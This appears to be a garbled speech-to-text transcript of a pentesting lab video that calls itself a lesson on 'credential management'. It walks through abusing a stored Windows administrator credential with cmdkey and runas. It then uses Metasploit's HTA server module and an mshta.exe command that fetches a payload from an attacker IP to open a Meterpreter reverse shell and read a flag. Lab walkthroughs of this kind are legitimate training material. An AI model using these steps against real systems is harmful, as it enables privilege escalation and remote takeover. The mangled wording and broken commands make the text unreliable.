Hello guys, welcome back to your Pentesters Club. Today we are going to discuss about credential management. So what is a credential management? So credential management in a text context of usually refers of managing and using a login credentials to access a various virtual machines are challenging the platforms. So we can see like here registration logins and access challenges and credential storage and researchers multi-factor authentications and learning the processes and many things. So now we can go through here. Okay, so now I have two machines. One is Linux and another one is attacker machine. So in the production server, some of operations as an admin requires to enter a credentials repeatedly. Also, users save the credentials to credential manager for quick access. A credential manager stores a web and Windows credentials. Okay. So assume that the moment of an attacker got an access to the system physically or remotely, then it would be easy to access those credentials and run and appropriately with this. So now we check all these things. So come back here. We need to open a Windows PowerShell. Type yes, Windows PowerShell. So now we are in the Windows PowerShell. So we need to type cmd key list. So what is the cmd key list? So cmd key is a utility to store or delete a list of credentials. So let's see. So you can see currently sorted a credentials, a target domain, type a domain password, user private ESC administrator. So we can notice that administration's user credentials are stored. Without reading the passwords, the administration account can usually we can use it using the run as exe utility. So now for this we need to go with we can see here once again. So now we can open a command prompt. Now I can type who am I. So private ESC student. So before that we tried to hear something. You can type run as .exe. Say create user administrator cmd. So now it's came already. So now I can type who am I. Now you can see here we got it an administrator. So we just close this. So now we need to switch to a Kali Linux machine. Now come back to a terminal. You just open terminal. So you need to close this, make it big. So here what you need to do is you need to type ifconfig Here is Ethernet 1, 10.10 at Ethernet 0. So just clear this, you can type here target machine IP address. Okay, so just given. So you can type msf console minus q. So let's see. So now it's came here. So you need to type use exploit Windows MISC HTA dot service, no, server. So we try to exploit, but we not yet set anything else. So exploit running and the background job, exploit is completed but no session was created. So this is the session. Okay, so we need to copy this and exploit, okay, with an IP address. Just copy this, copy the generated payload and run it on the cmd.exe with the msh take command. So to gain the meter Peter shell, so you need to execute this one. So we need to go to a switch to a target machine. So attacker machine, you need to type ms hta.exe, then paste it. No, we not yet get here. So we need to type normally http 10.10.23.2. So we need to type 10.10.23.2 8080 forward slash. So come back to attacker machine, make it ei7c fde dot hta. So just enter, we get another subterminal. So we can accept a meter Peter shell now in the attacker machine. Now you can see HTA delivering a payload. Okay. So now what we need to do is here we need to type sessions minus I. So we got it here. Minus I1. So now we got already here meter Peter session. So what we need to do is here cd capital C you need to type users administrator desktop. Now type a list. Here you have flag.txt. So you need to type cat flag.txt. So this is the flag.txt which you also got here. Okay. So this is a reverse shell, the flag to us. So this is how you can do a credentials management in the Windows and Linux. So thank you guys for watching. Have a nice day.